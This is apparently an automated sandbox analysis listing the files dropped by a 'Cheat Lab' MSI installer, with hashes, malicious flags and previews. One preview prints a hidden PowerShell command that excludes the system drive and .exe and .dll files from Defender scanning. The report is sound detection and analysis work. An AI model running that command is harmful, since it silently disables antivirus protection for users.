                                                                                                                                                                      SHA-512:CD1EE8813C385213C1EDA31B8C460FF21ED25F228D39DA58A95B1A5CCD5E71E4B7964A2BCC22161730C92C68FBA3FE8EFF2418FEF50B8CEBBBA9CC5C303538C7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):128
                                                                                                                                                                      Entropy (8bit):4.7202350646624245
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:VSJJFIf9IMwEIF2VCceGAFddGeWLCX3AYGeWLERySn/n:s81xB1eGgdEY3AYGWRy0n
                                                                                                                                                                      MD5:89DB4CB88ED70579D72B500340691359
                                                                                                                                                                      SHA1:5A434F58080EEDFC78B0BA0A49710C6F3EFC5254
                                                                                                                                                                      SHA-256:72B2FAA3B9D4FB7CD3E007CF5DFB00D03893B26A6161D6ADE8D003F3D669C57E
                                                                                                                                                                      SHA-512:6E47F9F9DB0FCF42489567AD5DA1F1A031FC7423EE2DC79F94CDC3FF249FE18D1E8835D1A26655F4FE5BF58E8525EDBD227B12ED15EFFDDFF51642D57DB1E0BB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129872
                                                                                                                                                                      Entropy (8bit):6.038065588362103
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:2pA3JKOc1a+6lXmdTstTIezbdVR6KuyZze638dtoXKtmQkxE08yaU7L2SyCla:22bc5ApIsBVRVCtRkxE08yaC7yj
                                                                                                                                                                      MD5:5DE081465476323E3DCBE97602183C87
                                                                                                                                                                      SHA1:D3BD6A912A0FEF185ED8E02B9C411809B20EC7C0
                                                                                                                                                                      SHA-256:9C0ED1349DA4BA4449559FCEEBAC4556ADD7009684367151673A2F52200F3E84
                                                                                                                                                                      SHA-512:20CFB8DC88F81BE8356FB3EDA4AB74C0F137FBF4E3838FA545F47B941B1E10A344B8733F711C360964FC40F086EC986D689EB6EFDD5029D354D11F2BB004C4BD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1159168
                                                                                                                                                                      Entropy (8bit):6.056000673170944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                                                                                                                                      MD5:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      SHA1:BEF96A36BA40446FBE5596D50BBC9E9ADC154D3B
                                                                                                                                                                      SHA-256:345911E89D241BC814827AEAB2F59004AF713BD088098634440EFF1B237DAF3D
                                                                                                                                                                      SHA-512:CD1EE8813C385213C1EDA31B8C460FF21ED25F228D39DA58A95B1A5CCD5E71E4B7964A2BCC22161730C92C68FBA3FE8EFF2418FEF50B8CEBBBA9CC5C303538C7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129872
                                                                                                                                                                      Entropy (8bit):6.038065588362103
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:2pA3JKOc1a+6lXmdTstTIezbdVR6KuyZze638dtoXKtmQkxE08yaU7L2SyCla:22bc5ApIsBVRVCtRkxE08yaC7yj
                                                                                                                                                                      MD5:5DE081465476323E3DCBE97602183C87
                                                                                                                                                                      SHA1:D3BD6A912A0FEF185ED8E02B9C411809B20EC7C0
                                                                                                                                                                      SHA-256:9C0ED1349DA4BA4449559FCEEBAC4556ADD7009684367151673A2F52200F3E84
                                                                                                                                                                      SHA-512:20CFB8DC88F81BE8356FB3EDA4AB74C0F137FBF4E3838FA545F47B941B1E10A344B8733F711C360964FC40F086EC986D689EB6EFDD5029D354D11F2BB004C4BD
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3094
                                                                                                                                                                      Entropy (8bit):5.33145931749415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                      MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                      SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                      SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                                                                                                      SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2232
                                                                                                                                                                      Entropy (8bit):5.379677338874509
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:tWSU4YymI4RIoUeW+gZ9tK8NPZHUxL7u1iMuge//ZeUyus:tLHYvIIfLgZ2KRHWLOugos
                                                                                                                                                                      MD5:85AAA19A9B0A06E085BF32A33F55A839
                                                                                                                                                                      SHA1:D0803618296D04D63ADA3215CC97A7B32EC91BE8
                                                                                                                                                                      SHA-256:AC45C6B577CF08455F66BF9ED464FBEF89AA75F65254CD351931A6EC8F2D098A
                                                                                                                                                                      SHA-512:B11F41129E5EB7A21FD02820BA73B4815B3AB1A0DFBC284764F08E094D84F8DFC414318C0ED6DF6E83688E8570F30E305311D341ABC685543D8319C9E4CAB543
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.0.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: , Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: winrar-611br.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Firefox-x64.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDeskAPP.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: 6p2LSuB1em.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDesk.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: MERC_PG_MDLS.msi, Detection: malicious, Browse
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1074015689
                                                                                                                                                                      Entropy (8bit):0.0048756959434813766
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:DECF64C46889E5C44B7924E5318FC57E
                                                                                                                                                                      SHA1:8F1805C6F77844A6754738B371178C25FDF04630
                                                                                                                                                                      SHA-256:B8E1072E5CF3C7695E0736D2EA09CC4CEDCC90F5285D0F0D0DF9A6994B3BE8CB
                                                                                                                                                                      SHA-512:D131BC345B2398ECC360A1D47FB8D767350182F0A8E726E3C7B96A58D4C790A7B90B9ABC5EE071112823CD6888FD3F123D76C6FF74AF33C8A7825F852D5CFCD4
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2064
                                                                                                                                                                      Entropy (8bit):3.9639720886787493
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YM0gQlcfcTnXRfhZa87MHV9fEgptajQAs9l:fQfnBZcgWcgptyQAs7
                                                                                                                                                                      MD5:C12B426B11A7B95D2DF7EF2D2F2EFE5F
                                                                                                                                                                      SHA1:F8C22CCBADFB5A38816EC727B0B5768801FDDE2E
                                                                                                                                                                      SHA-256:1BC0AF7D72B09BE2CE4A18EBDAAD7D1BDE137EA5FC3ED0203A02F713499015A6
                                                                                                                                                                      SHA-512:9F3A903F78579399E9589876756FA3EBA2C052F32ACDC31A80E5A1D129CAC1F1926E0E231DC45B4AD8EECC1BFD1178BB52BFF11D322BEAA8CA6920B66BD939C8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3C7A1E44-AA05-4B3F-B2A1-48DCB7D1B307}, Number of Words: 2, Subject: Cheat Lab, Author: Cheat Lab Inc., Name of Creating Application: Cheat Lab, Template: x64;1033, Comments: This installer database contains the logic and data required to install Cheat Lab., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2020352
                                                                                                                                                                      Entropy (8bit):7.183219452373841
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:1VkldbW8zBQSc0ZnSK/uxtZCZKumZrROOsLRTtA:mo0ZnPux4KdsLRTtA
                                                                                                                                                                      MD5:5395845C70FD2495F0407291BE32201C
                                                                                                                                                                      SHA1:A76288FE27B9684ED8D141B50AA55437833ED1A2
                                                                                                                                                                      SHA-256:338F6A75E6E11459A5CEDB3A2917F9B3F9FCB4991FEC84514692B649393EA3BB
                                                                                                                                                                      SHA-512:6550AE020F597FBF37FD56582EEC4911B2CAC7860D510F54C2E68CCC4A3ACD4EC04734BA0A683B1B04DE15C9832F3F8CE4524C177D8F234AAE6A43354B33C71A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):191968
                                                                                                                                                                      Entropy (8bit):6.4059654303545885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                                                                                                                                      MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                                                                                                                                      SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                                                                                                                                      SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                                                                                                                                      SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):785324
                                                                                                                                                                      Entropy (8bit):6.51909311320731
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:waHRuEs3Xmm9DZE8aHRuEs3Xmm9DZEEMvZx0FlS68zBQSncb4ZPQTpAjZxqO1k:w25snmmtZx25snmmtZlMvZCFlp8zBQSa
                                                                                                                                                                      MD5:31F5B4CDF0236B1BC3E5879A04E3D9BC
                                                                                                                                                                      SHA1:F1E0830929725490F465E637A5060547FD8747D7
                                                                                                                                                                      SHA-256:7ACBC931D80BC97FC223BDA0C43E5527203C209F252DD1910FCD907A1CCB10CA
                                                                                                                                                                      SHA-512:7BF30E3A5002BA923F6FD473D186DB669B59061E8CEFDBEE98161DF6E067D46110260279DAD750A5C0FD646D1237B328CB1C883264001203762F826DA28FC48A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...@IXOS.@.....@b|fW.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{3C7A1E44-AA05-4B3F-B2A1-48DCB7D1B307}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]J...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):191968
                                                                                                                                                                      Entropy (8bit):6.4059654303545885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                                                                                                                                      MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                                                                                                                                      SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                                                                                                                                      SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                                                                                                                                      SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):399328
                                                                                                                                                                      Entropy (8bit):6.589290025452677
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                      MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                      SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                      SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                      SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.1666352704109029
                                                                                                                                                                      Encrypted:false
